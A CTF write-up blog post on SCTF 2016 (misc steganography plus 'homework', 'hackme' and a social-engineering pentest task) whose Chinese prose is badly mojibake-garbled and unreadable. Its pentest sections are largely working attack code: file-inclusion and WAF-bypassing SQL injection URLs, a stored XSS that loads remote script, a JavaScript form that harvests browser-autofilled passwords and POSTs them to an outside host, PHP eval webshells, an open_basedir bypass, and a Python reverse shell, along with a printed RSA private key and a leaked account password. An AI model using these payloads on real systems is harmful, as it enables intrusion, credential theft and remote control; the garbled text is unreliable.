LoRexxar's Blog

sctf2016_writeup

2016/05/09

鍛ㄦ湯鎵撲簡sctf2016锛岀粨鏋滈亣鍒颁簡tomato澶х鐨勫悇绉嶆笚閫忛鐩.澶х鐨勮剳鍥炶矾閮藉ソ闀垮晩锛岄鐩兘鏄竴灞傝繛涓灞傗

MISC

绁炵浠g爜

璁蹭釜鏁呬簨锛屽彨鍋氱绉樹唬鐮併

鎵撳紑鏁呬簨鐨勭洰褰曗.
澶у厔寮燂紝鐪熻溅鍟~~涓棰楄禌鑹

绋嶅井璇曚簡涓涓嬪彂鐜版病浠涔堟敹璐э紝鐢╢oremost鎷嗗嚭鏉ヤ竴涓猺.zip锛岀粨鏋滀富鍔炴柟璇存病鍏崇郴鈥

鍚庢潵缁欏嚭涓涓彁绀

绁炵浠g爜_hint stegdetect

閭e氨涓嬭繖涓蒋浠跺惂锛屾悶浜1澶╅兘娌℃悶瀹氾紝缁撴灉鎹釜浜烘崲涓猯inux灏变笅濂戒簡锛岃窇鍑烘潵鏄疛Phide锛岄偅涔堟悳鎼滅湅鍚

http://linux01.gwdg.de/~alatham/stego.html

浠庤繖閲屽彲浠ユ悶鍒皐indows鐗堢殑JPhide瑙e瘑宸ュ叿锛屾墦寮鐢ㄧ┖瀵嗙爜灏卞彲浠ヨВ鍑烘潵浜

PENTEST

娓楅忕殑姘村钩杩樹笉澶熼珮锛屽悗闈㈢湅鍒板埆鐨剋p浼氬啀鎱㈡參琛ュ洖鏉モ

homework

杩涘幓鐪嬪埌鏄竴涓鐢熺殑浣滀笟绯荤粺锛岀◢寰炕缈诲彂鐜颁竴涓噸瑕佺殑鍦版柟
http://homework.sctf.xctf.org.cn/homework.php?homework=homework.txt
瀛樺湪鏈湴鏂囦欢鍖呭惈婕忔礊锛屽厛璇绘簮鐮佸洖鏉ュ惂
http://homework.sctf.xctf.org.cn/homework.php?homework=php://filter/read=convert.base64-encode/resource=homework.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
session_start();
include('./config.php');
@$username=$_POST['username'];
@$password=$_POST['password'];
@include($_GET['homework']);
$username=intval($username);
$password=md5($password);
$result=mysql_query("select * from info where username='$username'&&password='$password'");
$row=mysql_fetch_array($result);
if(empty($row))
{
print("脙禄脫脨赂脙脩搂脡煤禄貌脮脽脙脺 毛麓铆脕脣脪虏脫脨驴脡脛脺脢脟脛茫碌脛脩搂潞脜麓铆脕脣.....脳脺脰庐脫脨脢虏脙麓碌脴路陆麓铆脕脣隆拢");
exit();
}else
{
$_SESSION['login']=1;
$_SESSION['xuehao']=$row['username'];
header("Location: ./homework.php");
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<html>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</html>
<?php
session_start();
if($_SESSION['login']!=1){
exit('Plz Login');
}
if(preg_match('/^read/',$_GET['homework']))
{
exit('Plz Don\'t read my code');
}
@include($_GET['homework']);
include('./config.php');
$result=mysql_query("select * from info where username='$_SESSION[xuehao]'");
$row=mysql_fetch_array($result);
echo "Welcome".$row['name']."</B>to Homework Center.<br />";
echo "<img src='".$row['pic']."'><br />";
echo "<a href='./homework.php?homework=homework.txt'>homework</a>";
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
<html>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</html>
<?php
include('./config.php');
session_start();
function make_password()
{
$password="";
$chars="abcdefghijklmnopqrstuvwxyz1234567890-=!@#$%^&*_";
for($i=0;$i<8;$i++)
{
$password.=$chars[rand(0,46)];
}
return $password;
}
if(isset($_POST['captcha_code'])){
// code for check server side validation
if(empty($_SESSION['captcha_code'] ) || strcasecmp($_SESSION['captcha_code'], $_POST['captcha_code']) != 0){
exit('茅陋聦猫炉聛莽 聛茅聰聶猫炉炉');
}else{// Captcha verification is Correct. Final Code Execute here!
}
}
if(isset($_POST['upload'])){
$filename = $_FILES['uploaded']['name'];
$filetype = $_FILES['uploaded']['type'];
$filesize = $_FILES['uploaded']['size'];
$tmpname = $_FILES['uploaded']['tmp_name'];
$uploaddir = './upload/';
$target_path = $uploaddir.basename($filename);
$fileext = substr(strrchr($filename,"."),1);
if(($fileext == 'gif')&&($filetype == "image/gif")){
{
if(move_uploaded_file($tmpname,$target_path))
{
}
}
$im =imagecreatefromgif($target_path);
srand(time());
$newfilename = strval(rand()).".gif";
$newimagepath = $uploaddir.$newfilename;
imagegif($im,$newimagepath);
unlink($target_path);
}else if(($fileext == 'jpg')&&($filetype == "image/jpeg"))
{
if(move_uploaded_file($tmpname,$target_path))
{
}
$im =imagecreatefromjpeg($target_path);
srand(time());
$newfilename = strval(rand()).".jpg";
$newimagepath = $uploaddir.$newfilename;
imagejpeg($im,$newimagepath);
unlink($target_path);
}else if (($fileext=='png')&&($filetype=="image/png"))
{
if(move_uploaded_file($tmpname,$target_path))
{
}
$im =imagecreatefromjpeg($target_path);
srand(time());
$newfilename = strval(rand()).".png";
$newimagepath = $uploaddir.$newfilename;
imagejpeg($im,$newimagepath);
unlink($target_path);
}
}
if(isset($_POST['name'])&&isset($_POST['age']))
{
$name=substr($_POST['name'],0,6);
$age=intval($_POST['age']);
$username=file_get_contents('./id.txt');
$password=make_password();
file_put_contents('./id.txt',intval($username)+1);
mysql_query("insert into info(username,password,name,pic,age)values('$username',md5('$password'),'$name','$newimagepath',$age)");
mysql_close($con);
print("莽聰聼忙聢聬忙聢聬氓聤聼茂录聦氓颅娄氓聫路:$username,氓炉聠莽 聛茂录職$password");
print("<a href='./index.html'>氓聸聻盲赂禄茅隆碌</a>");
}
?>
1
2
3
4
5
6
7
8
9
<?php
$db_user='web';
$db_password='WebPaSSw0rd!';
$db_host='localhost';
$db_database='web';
$con =mysql_connect($db_host,$db_user,$db_password) or die('Not connect');
mysql_select_db($db_database,$con) or dir('Not select');
mysql_query('SET NANES UTF8');
?>

绋嶅井鐮旂┒涓涓嬫簮鐮佸彂鐜皀ame瀛樺湪娉ㄥ叆锛屼絾鏄彧鏈6浣嶏紝鎵浠ユ病浠涔堢敤銆
閭e氨鏄笂浼犳枃浠剁殑鍦版柟鏈夐棶棰樹簡锛屾祴璇曚竴涓嬪彂鐜伴噸鐐瑰湪浜庤繖涓や釜鍑芥暟imagecreatefromjpeg
imagecreatefromgif

鍙戠幇杩欎袱涓嚱鏁颁細鎶婂浘鐗囧仛澶勭悊锛屽鏋滃浘鐗囨槸涓嶅彲瑙f瀽鐨勶紝閭d箞鐩存帴鍥炶繑鍥瀎alse涓嶄細鍐欒繘鏂囦欢涓幓銆傞偅涔堝簲璇ュ氨鏄瀯閫犱竴涓浘鐗噑hell浜

鍋氶鏃跺紑濮嬭俯浜嗗潙锛屽洜涓哄彂鐜拌繖涓嚱鏁颁細鎶婂浘鐗囦腑鐨勫唴瀹归噸鏋勮繃锛屾墍浠ョ洿鎺ュ啓shell澶辫触锛屾墍浠ヨ瘯鍥惧啓鍦ㄤ笉浼氳澶勭悊鐨勫湴鏂癸紝鎵浠ュ彂鐜颁簡杩欑瘒鏂囩珷https://www.secgeek.net/bookfresh-vulnerability/

铔嬬柤鐨勬槸绾夸笂鏃犳晥锛堝悗鏉ュ彂鐜板叾瀹瀙hpInfo()鍏跺疄琚垹浜嗭級锛岀劧鍚庢壘鍒殑鍔炴硶锛屽皾璇曚娇鐢╣if

娴嬭瘯鍙戠幇gif鐨勫鐞嗕笉鍍廽pg閭d箞涓ユ牸锛屽嚑涔庢病鏈夊鍥剧墖鐨勯噸鏋勶紝鎵浠ュ湪鍥剧墖鐨勫墠闈㈠湪涓嶅奖鍝嶅唴瀹圭殑鎯呭喌涓嬪啓鍏ヤ簡涓鍙ヨ瘽銆

鐒跺悗鍒楃洰褰曡鏂囦欢灏眊et flag浜

1
a=echo "<br />";$handler = opendir('./');while( ($filename = readdir($handler)) !== false ) {echo $filename."<br/>";}$username=file_get_contents('./4ff692fb12aa996e27f0a108bfc386c2');var_dump($username);

hackme

棰樼洰鍒氬嚭鐨勬椂鍊欐病鍘荤湅锛屽悗鏉ュ彂鐜扮粰浜嗕竴澶у爢鎻愮ず
Hackme鎻愮ず
1.缃戠珯寮鍙戜汉鍛樼粡甯镐細鍘荤湅澶囧繕褰
2.鎯冲姙娉曟嬁鍒扮鐞嗗憳瀵嗙爜

鎵撳紑绔欏彂鐜板苟涓嶈兘娌℃湁鎵惧埌澶囧繕褰曞湪鍝
鍙兘鎵惧埌
http://hackme.sctf.xctf.org.cn/login.php
http://hackme.sctf.xctf.org.cn/index.php?id=1
杩欎袱涓〉闈€
娴嬭瘯鍙戠幇瀛樺湪娉ㄥ叆
http://hackme.sctf.xctf.org.cn/index.php?id=-1||1#
鍙戠幇瀵圭┖鏍煎拰寰堝鏁忔劅鍑芥暟鏈夎繃婊わ紝灏濊瘯鐢/!00000xxx/杩欐牱鐨勬柟寮忕粫杩囷紝鎴愬姛
http://hackme.sctf.xctf.org.cn/index.php?id=1/*!00000union*//*!00000select*/version()%23

鍏堢湅鐪嬫暟鎹簱鍐呭

1
2
3
4
5
6
7
8
9
10
11
5.5.42-log
user hackme@localhost
搴撳悕 hackme
搴撲腑鏈変袱涓〃
article
涓や釜鍒
id content
beiwanglu
3涓垪
id time event

鐪嬪埌鏈変釜beiwanglu鐨勮〃

http://hackme.sctf.xctf.org.cn/index.php?id=1/*!00000union*//*!00000select*/event/*!00000from*/beiwanglu%23
杩涘幓鐨勬椂鍊欑湅鍒版槸澶囧繕褰曞唴瀹癸紝鎯宠捣涓涓猦int鏄绠$悊鍛樹細鐪嬭嚜宸辩殑澶囧繕褰曪紝閭d箞鎻掑叆涓涓猨s鐪嬬湅

1
http://hackme.sctf.xctf.org.cn/index.php?id=1;/*!00000insert*//*!00000into*/beiwanglu(id,time,event)/*!00000values*/(77,84,%27%3Cscript/src=%22http://xxx/1.js%22%3E%3C/script%3E%27)%23

寮濮嬅楀洖鏉ヤ簡phpsession锛屽彂鐜版棤鏁堬紝浜庢槸灏濊瘯鑳戒笉鑳借鏂囦欢

1
http://hackme.sctf.xctf.org.cn/index.php?id=1/*!00000union*//*!00000select*/load_file('/etc/passwd')%23

鍙戠幇浠涔堥兘鑳借浜庢槸缈讳簡缈籶hp鍜宯ginx鐨勯厤缃紝杩樼炕浜嗙炕lnmp鐨刲og锛屾病浠涔堟敹鑾
灏濊瘯鑳戒笉鑳藉啓涓涓獁ebshell杩涘幓锛屽彂鐜版潈闄愪笉澶燂紝鍙兘鍐欏湪/tmp涓嬨

杩欐椂鍊欑湅鍒版彁绀鸿娴忚鍣ㄧ殑璁颁綇瀵嗙爜
鎯冲埌涓绉嶅彲鑳斤紝鏋勯犱竴涓〃鍗曪紝娴忚鍣ㄤ細鑷姩濉厖锛岀劧鍚庤幏鍙栧唴瀹筽ost鍥炴潵锛屽皾璇曚竴涓嬨

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
var form1 = document.createElement("form");
form1.id = "lg-form";
form1.name = "lg-form";
document.body.appendChild(form1);
var input = document.createElement("input");
input.type = "text";
input.name = "username";
input.id = "username";
input.placeholder = "username";
var input2 = document.createElement("input");
input2.type = "password";
input2.name = "password";
input2.id = "password";
input2.placeholder = "password";
var button1 = document.createElement("button");
button1.type = "submit";
button1.id = "login";
form1.appendChild(input);
form1.appendChild(input2);
form1.appendChild(button1);
form1.method = "POST";
form1.action = "";
user = document.getElementById('username').value;
pass = document.getElementById('password').value;
var xml = new XMLHttpRequest(); xml.open('POST', 'http://xss.xxx.cc', true); xml.setRequestHeader("Content-type","application/x-www-form-urlencoded");
setTimeout(xml.send('username='+user+'&password='+pass),2000);

鍚庨潰鐨剆ettimeout鏄洜涓虹涓娆℃祴璇曠殑鏃跺欏彂鐜板~鍏呮槸闇瑕佹椂闂寸殑锛屾墍浠ラ渶瑕佸欢鏃

get username&password

1
2
3
4
5
username
admin
password
nizhendeyongyuancaibudaomimade

鐧诲綍杩涘幓鍚庡彂鐜版槸涓笅杞藉櫒锛岀劧鍚庢湁浠绘剰鏂囦欢涓嬭浇婕忔礊锛屽彲浠ユ瀯閫....//index.php缁曡繃杩囨护锛堝叾瀹炰篃灏辨槸鍥犱负杩欎釜鎵嶅彂鐜颁箣鍓嶄細鎶ラ敊鐨刴ysql鍐欏叆鍏跺疄鏄啓鍏ヤ簡鐨勶級锛岄槄璇绘簮鐮佸彂鐜颁竴涓瘮杈冮噸瑕佺殑鏂囦欢鏄痵ession.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
<?php
class FileSessionHandler
{
private $savePath;
function open($savePath, $sessionName)
{
$this->savePath = $savePath;
if (!is_dir($this->savePath)) {
mkdir($this->savePath, 0777);
}
return true;
}
function close()
{
return true;
}
function read($id)
{
return (string)@file_get_contents("$this->savePath/sess_$id");
}
function write($id, $data)
{
return file_put_contents("$this->savePath/sess_$id", $data) === false ? false : true;
}
function destroy($id)
{
$file = "$this->savePath/sess_$id";
if (file_exists($file)) {
unlink($file);
}
return true;
}
function gc($maxlifetime)
{
foreach (glob("$this->savePath/sess_*") as $file) {
if (filemtime($file) + $maxlifetime < time() && file_exists($file)) {
unlink($file);
}
}
return true;
}
}
$handler = new FileSessionHandler();
session_set_save_handler(
array($handler, 'open'),
array($handler, 'close'),
array($handler, 'read'),
array($handler, 'write'),
array($handler, 'destroy'),
array($handler, 'gc')
);
register_shutdown_function('session_write_close');
session_start();

杩樻湁涓猧nit.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
header("Content-type:text/html;charset=utf-8");
//error_reporting(0);
if(@$_COOKIE['admin'] !=='f34c2e6132748fed3ac48959c10fddcb637ca8fb') exit('error!');
spl_autoload_register();
include 'session.php';
function download($filename){
if(!file_exists($filename)){
exit('鏂囦欢鎵句笉鍒!');
}else{
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Content-Disposition: attachment; filename={$filename}");
header("Accept-Length:".filesize($filename));
readfile($filename);
}
}

鎵惧埌涓绡囨枃绔犳槸
http://www.freebuf.com/vuls/89754.html

灏濊瘯浜嗗彂鐜扮幆澧冧笉澶浉浼硷紝鍚庢潵鎯宠捣鏉ヤ笁涓櫧甯芥浘缁忚杩囦竴涓
http://drops.wooyun.org/tips/10564
spl_autoload_register鍑芥暟
濡傛灉涓嶆寚瀹氬鐞嗙敤鐨勫嚱鏁帮紝灏变細鑷姩鍖呭惈鈥滅被鍚.php鈥濇垨鈥滅被鍚.inc鈥濈殑鏂囦欢锛屽苟鍔犺浇鍏朵腑鐨勨滅被鍚嶁濈被銆

鎸夌収杩欐牱鐨勬柟娉曞弽搴忓垪鍖杝ession鍙戠幇鍙兘鍖呭惈褰撳墠鐩綍涓嬶紝鎬庝箞閮藉寘鍚笉鍒/tmp/鈥︽兂浜嗗緢涔呬篃娌℃兂鍑烘潵锛屾斁寮冣.

璧涘悗鐪嬪埌浜嗗ぇ绁炵殑wp锛屾墠鐭ラ亾杩欓噷鍏跺疄鏄拷鐣ヤ簡涓涓緢閲嶈鐨勪笢瑗
http://www.firesun.me/sctf2016-web-hackme-writeup/

鍦╬hp.ini涓湁涓緢閲嶈鐨勮缃細

1
include_path= ".:/tmp"

鍦ㄦ湰鏈虹幆澧冧笅杩欓噷骞舵病鏈塼mp鐩綍锛堝繕璁扮湅棰樼洰鐨勪簡銆傘傘傦級
杩欐牱/tmp涔熶細琚sql_autpload_register鍑芥暟鎼滅储锛堥敊杩囦簡getshell鐨勬満浼氾級

鎴戜滑鍙互鏈湴娴嬭瘯涓涓嬭繖涓細

棣栧厛鍦╯ession.php涓嬪啓涓涓$_SESSION['a']=new test()

鐒跺悗鍦/tmp涓嬪啓涓涓猼est.php
<?php echo 233?>

1
2
root@VM-181-46-ubuntu:/home/wwwroot/default/test# php init.php
233PHP Fatal error: spl_autoload(): Class test could not be loaded in /home/wwwroot/default/test/session.php on line 63

铏界劧鎶ラ敊浜嗭紝浣嗘槸纭疄鎵ц浜嗭紝閭d箞鍓╀笅灏辨槸session鍙嶅簭鍒楀寲寰楅棶棰樹簡

鎴戜滑鍦/tmp鐩綍涓嬫瀯閫犱竴涓獁ebshell test.php

1
<?php eval($_GET['a'])?>

鐒跺悗鐢熸垚涓涓悎鐞嗙殑session鏂囦欢锛岀被浼间簬sess_26浣嶉殢鏈烘暟,鍚憇ess涓嬪啓鍏ユ垜浠兂瑕佺殑鍐呭

1
http://hackme.sctf.xctf.org.cn/index.php?id=0/*!00000union*//*!00000select*/'a|O:4:"test":0:{}'/*123*/into/*123*/outfile'/tmp/sess_xxxxxxxxxxxxxxxxxxx'

甯︾潃涓婇潰鐨剆ession鍘昏闂甿ain.php

getshell

杩欓噷firesun澶х鐢ㄤ簡

1
2
<?php
file_put_contents("/home/wwwroot/hackme/05d6a8025a7d0c0eee5f6d12a0a94cc9/shell.php",'<?php eval($_POST[1]);?>');

鍍忕綉绔欑洰褰曚腑鍐欎簡涓涓獁ebshell锛屾兂鎯冲簲璇ヨ姣旀垜鐨勬柟娉曟洿濂斤紝鏂逛究鍚庣画鐨勬搷浣

杩涘幓浜嗗彂鐜扮敱浜.user.ini璁剧疆浜

1
open_baseair = /home/wwwroot/hackme:/tmp/:/proc/

鎵浠ヨ鎯冲姙娉曠粫杩囦簡
鎴戝彧鐭ラ亾涓ょ锛岀涓绉嶆槸firesun澶х浣跨敤鐨
閫氳繃鍦ㄥ瓙鐩綍璁剧疆.user.ini鏉ヨ鐩栬缃

鐢变簬main.php銆乻ession.php銆乻ession.php鍦ㄥ瓙鐩綍05d6a8025a7d0c0eee5f6d12a0a94cc9/涓嬶紝鍦05d6a8025a7d0c0eee5f6d12a0a94cc9/涓嬪啓鍏ヤ竴涓.user.ini

1
open_basedir=/

鐒跺悗绛5鍒嗛挓鐢熸晥锛岀劧鍚巗hell涓嶅啀鍙梠pen_basedir闄愬埗锛屾壘鎵惧彂鐜癴lag鍦╳wwroot/flag_is_here涓

浣嗘槸杩欑鏂瑰紡涓嶆槸tomato澶х鐨勬湰鎰忥紝绗簩绉嶆柟寮忔槸鏈嶅姟鍣ㄩ厤缃笉褰撳鑷
http://wooyun.org/bugs/wooyun-2010-0145879
鍦╬hp.ini涓彲浠ョ湅鍒拌绂佺敤鐨勫嚱鏁

1
disable_functions = passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server

鍏朵腑灏戜簡涓涓緢閲嶈鐨勬槸pcntl_exe

璇存槑鎴戜滑鍙互鎵ц涓巔hp鏃犲叧鐨勪簩杩涘埗鏂囦欢锛屾潯浠跺ソ鐢氳嚦鍙互鍙嶅脊shell
鍐欎竴涓猵y鍦/tmp鐩綍涓

1
2
3
4
5
6
7
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP鍦板潃",绔彛))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"]);

鐒跺悗鐢╬cntl_exec鍚姩

1
pcntl_exec("/usr/bin/python",array("/tmp/1.py"));

get shell

褰撶劧鍙互鎯硍ooyun鏂囩珷涓婅閭f牱杈撳叆锛屽師鐞嗙浉鍚

铚滄眮鍏徃

http://mizhicrop.sctf.xctf.org.cn
1.鎻愮ず閮藉湪QQ绌洪棿閲岄潰
2.绀惧伐
3.鎵惧埌娴嬭瘯绔欑偣锛岀劧鍚庢嬁涓嬭湝姹佸叕鍙

http://user.qzone.qq.com/2137162120
28宀 6.1鐢熸棩 Bl4ck_Roll
鑲栧挭鍜 (Bl4ck_Roll)
铚滄眮鍏徃 - CTO

寰楀埌鍗拌薄绗旇
甯愬彿锛2137162120@qq.com
瀵嗙爜锛歺iaomimi0601

鍔犱簡濂藉弸绀惧伐鍒颁簡楠岃瘉鐮佲垰

鍙戠幇閲嶈鐨勪俊鎭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
鏈嶅姟鍣ㄧ鐞
114.215.103.83 鐢ㄦ埛鍚 bl4ckr0ll
鏈杩戣繖涓处鍙锋湁鐐归棶棰橈紝杩樻槸鎶婃墽琛屾潈闄愮粰鍘绘帀
id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAyYZoMBDUrjIYXLPbJsqNVDENbyWVSeKfyIc0bQ6LPBWYagKI
uPGQ3Lqq4vyvdePutqT7zhHEkj50RAOzTt2m595ldxx3YXYZhryF/XwDcKUhYv9O
Rqzt0j3MM+ekfrZI7cryMvUJcoYdwnaD+O7ZOdmmE7gMkcHzlN+LDDND99JbzbrI
C2kvHqWskE/zfMn2heI5MFPf0zLZgm932J6UI5ms0CdgVQCIQX3LzYfhC+mdbe3p
X9ptcSeCowjC5RdqtjiML6DWvmD2VcavJRfqDi26pKmhy8xnOoeDJu87WpFXnQbx
GJpJ81QsFJPRyXdT5NZojhR7Jz4lnnwHz9kZZQIDAQABAoIBAEkW10i/gfNftdhB
XvVVtyZW2BF8pwVyDRN0ff4jrTnwdyPToXS6IBj+FqZWkOiH73cMpUraxNlpj09v
rCOpXjRwQ4qMp3uQkrd8Pnht9u1u5on6IJCffW2n/hzBIbbXM+ISnf7/QhroK3jw
9PJe5igGGSbDtMNUfZx76vlUyozheCvBO98FvS5maHx5Si4POeGU9JyU4gA4SFvX
0JIcI7DjLCpL23kuG5hXBDx5IEPXAB7HTqXcd+CF+/qIsPbeRdy5Ys03pNJ1BGqt
/9vlryUYs0PIE4vAx6iBZhwffEbpcLsSlTB0HTbyFGKs2IJqdu5tP3aC81yhN4Kw
WQMZAK0CgYEA9W1i80/wkSuGR9gnP1NEuLFpAcqDEXSpVJbi6xdOeFqq9r54zt9O
ml41FAtV15/3zkrUh/P5RvtR1Jz23kQF4IKHn76KTYUAt/AcY4P4Bg4qI6QiUigO
r7YfAslGjGJNwLMokIt3Dizrq19QCc+9gaRVI20HV+gd4FSBywdmOKsCgYEA0jTb
4RgJHAwXuec3jIuO9P4G9m+iA3dGCW/ZkySLCQBLHr2pjTzEf+2/CNJTVKnfASrs
sJpicKr/n/O7SJJi0M/vAkcJLi5yH7R3nX7sRJn9BBxxC5gxGFFgtTXS5hwOj2wy
cpHXS6ObKa+58MKJ+cqA1yUjvDYa5Q6c6m2iFi8CgYANoZ21VeNOrNQweVj0s3NF
rtTePJk7BvfAswC3ffvlw2NrgPjExLJg8IqSKm8CIuholM9pHavivWK2JGGxxqVs
6tMNlE+qLpDzpmptPI8yBudgQ2WEmqT2LW9bgEJi2bLn2QuPu69JIkWUpx6S7O7h
nHb+GLgnscS3CPqMhESxMQKBgQCnRytHOHJfYHwtE4QQEysjaVevGu0J5wvUDK9P
OgBunE4rW3EnFRmmWFLyuTVZJYlyi28ppuH5mQqthi8etGdwllg0LsVue8WT13Bs
5AkvGn/PmraXLHi9Sl00N23qcp9foRGQPODgr4SVquLEZnuYTX80Nrj2WPQUHgnf
QHmBPwKBgEpoS+y1s3P8YIW50dpCA4PNQgBNwWpWXiHgMiftGtlq3+t7VUZcJqq+
ak3/isqwkfTRqWZwrWD26RIgUAyp16ufoRkOlASac5jVPc5BsTg/bwhpbVha8Lyi
Vj861IZS+UMaoS7KHggTrxxZ6QzwRI1bjYWkyNMhpTweH4/O8Ydf
-----END RSA PRIVATE KEY-----

浣嗘槸涓杩炰笂灏变細琚涪鍑猴紝鎵浠ュ悗鏉ユ病鍋氫簡锛屼絾鏄瘮璧涜缁撴潫鐨勬椂鍊欏緱鍒颁竴涓猚ve缂栧彿
cve-2016-3115

鎵惧埌涓绡囨枃绔

http://blog.csdn.net/qq_27446553/article/details/50906562

寰楀埌涓涓猵oc锛屽皾璇曞彂鐜版垚鍔熻繛涓婃湇鍔″櫒锛屽彲鎯滅殑鏄彧鏈夎鏂囦欢鍜屽啓鏂囦欢鐨勫姛鑳斤紝缈讳簡10鍒嗛挓涔熸病鎵惧埌浠涔堟湁鐢ㄧ殑淇℃伅鈥.濂藉惂Orz

CATALOG
  1. 1. MISC
    1. 1.1. 绁炵浠g爜
  2. 2. PENTEST
    1. 2.1. homework
    2. 2.2. hackme
    3. 2.3. 铚滄眮鍏徃